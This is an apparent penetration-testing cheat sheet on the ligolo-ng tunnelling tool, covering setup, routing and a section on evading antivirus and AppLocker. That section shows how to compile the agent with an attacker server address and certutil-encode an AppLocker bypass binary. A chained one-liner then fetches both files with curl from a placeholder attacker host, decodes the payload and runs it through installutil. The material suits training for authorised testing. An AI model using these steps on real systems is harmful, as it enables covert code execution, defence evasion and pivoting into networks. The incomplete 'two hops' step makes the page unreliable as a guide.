# ligolo-ng

<p class="callout warning">You can use the standard apt repos if you don’t need to do any modifications, e.g. bypassing Applocker or CLM.</p>

```powershell
sudo apt install ligolo-ng ligolo-ng-common-binaries -y
```

# Basic tunnel

1. start `ligolo-proxy`

```powershell
sudo ligolo-proxy -selfcert

```

1. Connect the agent
2. enter session and list network configuration
    
    ```powershell
    #in ligolo-ng
    sessions
    ifconfig
    
    ```
3. set route
    
    
    1. 1 hop
        
        ```powershell
        autoroute
        start
        
        
        ```
    2. 2 hops

## AV evasion

1. Clone the repository
    
    ```powershell
    git clone https://github.com/nicocha30/ligolo-ng.git
    ```
2. Edit the `ignoreCertificate` and `serverAddr` variables in the following file `/ligolo-ng/cmd/agent/main.go`
3. Compile the `agent.exe` using the following command
    
    ```bash
    GOOS=windows go build -o agent.exe cmd/agent/main.go
    ```
4. Compile as `x64` and give the name `ApplockerBypassExternalBinary.exe` - [Github Repo](https://github.com/blu3drag0nsec/osepvs/tree/main/tools/06.applocker/ApplockerBypassExternalBinary)
5. Encode the file created above with certutil
    
    ```powershell
    certutil.exe -encode .\\ApplockerBypassExternalBinary.exe AppLockerBypassLigolo.txt
    ```
6. Rename the `agent.exe` to `ligolo-agent.exe`
7. Serve the files (`ligolo-agent.exe` and `AppLockerBypassLigolo.txt`
8. Upload the files to the target
    
    ```powershell
    cmd.exe /c curl http:/YOUR_IP/ligolo-agent.exe -o C:\\users\\public\\try-agent.exe && curl http://YOUR_IP/AppLockerBypassLigolo.txt -o C:\\users\\public\\enc.txt && certutil -decode C:\\users\\public\\enc.txt C:\\users\\public\\ligolo.exe && del C:\\users\\public\\enc.txt && C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\installutil.exe /logfile= /LogToConsole=true /U C:\\users\\public\\ligolo.exe
    ```